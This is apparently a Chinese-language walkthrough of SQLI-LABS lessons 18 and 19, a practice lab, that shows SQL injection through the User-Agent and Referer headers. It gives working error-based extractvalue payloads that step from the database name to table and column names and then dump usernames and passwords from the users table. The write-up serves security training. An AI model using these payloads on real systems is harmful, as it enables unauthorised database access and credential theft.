SQLI-LABS Less-18 到 Less-19

Header

请求头注入，User-Agent、Referer、Cookie、......，注入点不同，注入手法相似

Less-18

User-Agent：通常就是用户的浏览器相关信息。例如：User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0

'$uname' 和 '$passwd' 都进行了过滤

需要正确的账号密码才能执行到insert

闭合字符：' or 1 or ' 或 ' and 1 and '

uname=admin&passwd=admin&submit=Submit
#这里主要是判断账号能否登入
#Header注入也可以用 Burp Suite

判断闭合字符：

测试：User-Agent: '

源代码，'$uagent'，在 '$IP' 和 'uname' 的前面，就不能把他们注释掉，不然根本 insert 不进

User-Agent: ' or 1 or '
#在数据库里就是这样的(''or 1 or '','$ip','$uname')
#达到了闭合的效果，进行下一步

查询当前数据库：

User-Agent:' or extractvalue(1,concat(0x7e,database())) or '

查询当前数据库的表：

User-Agent: ' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) or '

查询当前表的字段：

User-Agent: ' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) or '

查询数据：

User-Agent: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) or '
User-Agent: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) or '
...

Less-19

Referer：指当前请求的URL是在什么地址引用的。例如在www.a.com/index.html页面中点击一个指向www.b.com的超链接，那么，这个www.b.com的请求中的Referer就是www.a.com/index.html。通常我们见到的图片防盗链就是用这个实现的

'$uname' 和 '$passwd' 进行了过滤

需要正确的账号密码登录，才能执行insert

闭合字符：' or 1 or ' 或 ' and 1 and '

判断闭合字符：

Referer: '
Referer: ' or 1 or '
#在数据库里就是这样的(''or 1 or '','$ip')

查询当前数据库：

Referer: ' or extractvalue(1,concat(0x7e,database())) or '

查询当前数据库的表：

Referer: ' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) or '

查询当前表的字段：

Referer: ' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) or '

查询数据：

Referer: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) or '
Referer: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) or '
...